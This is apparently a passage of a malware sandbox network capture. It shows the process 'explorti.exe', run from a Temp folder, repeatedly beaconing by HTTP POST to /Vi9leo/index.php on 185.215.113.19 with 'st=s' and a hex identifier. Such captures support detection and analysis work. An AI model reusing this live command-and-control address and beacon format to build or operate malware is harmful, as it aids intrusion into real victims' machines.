Jul 26, 2024 21:04:32.291646957 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:32.542463064 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	56746	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:32.668355942 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:33.511905909 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:33.512897015 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:33.767568111 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	56747	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:33.902399063 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:34.702836990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:34.703535080 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:34.957024097 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	56748	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:35.086632013 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:35.883234024 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:35.892884970 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:36.148570061 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	56749	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:36.263509035 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:37.049099922 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:37.049786091 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:37.299658060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	56750	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:37.669421911 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:38.440346003 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:38.441282034 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:38.692383051 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	56751	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:38.811434984 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:39.603293896 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:39.606389999 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:39.866234064 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	56752	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:39.982115984 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:40.799727917 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:40.800688028 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:41.053072929 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	56753	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:41.172333956 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:41.940718889 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:41.942014933 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:42.192174911 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	56754	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:42.329258919 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:43.155633926 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:43.156362057 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:43.406505108 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	56755	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:43.514236927 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:44.445672989 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:44.446644068 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:44.698771954 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	56756	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:44.813455105 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:45.597225904 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:45.598323107 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:45.846950054 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	56757	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:45.966937065 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:46.720804930 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:46.721968889 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:46.982356071 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
